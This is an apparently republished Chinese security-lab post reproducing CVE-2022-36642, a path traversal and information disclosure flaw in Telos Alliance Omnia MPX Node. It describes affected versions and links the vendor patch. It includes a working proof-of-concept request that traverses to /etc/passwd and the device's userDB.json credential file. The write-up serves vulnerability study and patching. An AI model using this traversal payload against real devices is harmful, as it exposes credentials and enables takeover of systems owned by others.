Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

admin 2023年3月24日09:19:32评论94 views字数 968阅读3分13秒阅读模式


网安引领时代,弥天点亮未来   





 

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

0x01漏洞介绍


Telos Alliance Omnia MPX Node是美国Telos Alliance公司的一个专用硬件编解码器。能够利用 Omnia μMPXTM 算法以低至 320 kbps 的数据速率发送或接收完整的 FM 信号,非常适合容量有限的网络(包括 IP 无线电)。

Telos Alliance Omnia MPX Node 1.5.0+r1版本及之前版本存在安全漏洞,该漏洞源于/appConfig/userDB.json 存在本地文件泄露漏洞。攻击者利用该漏洞提升权限到 root 并执行任意命令。

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)




Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

0x02影响版本

Telos Alliance Omnia MPX Node 1.5.0+r1版本及之前版本


Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

0x03漏洞复现


1.访问漏洞环境

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

2.对漏洞进行复现

POC

/logs/downloadMainLog?fname=../../../../../../../etc/passwd/logs/downloadMainLog?fname=../../../../../../../config/MPXnode/www/appConfig/userDB.json

目录穿越/目标遍历

cat /etc/passwd

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

cat /etc/hosts

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

信息泄露:userDB.json

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

3.nuclei工具测试(漏洞存在)

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)



Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:


https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node


弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来


















Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642) 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)


原文始发于微信公众号(弥天安全实验室):Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月24日09:19:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)https://cn-sec.com/archives/1624618.html

发表评论

匿名网友 填写信息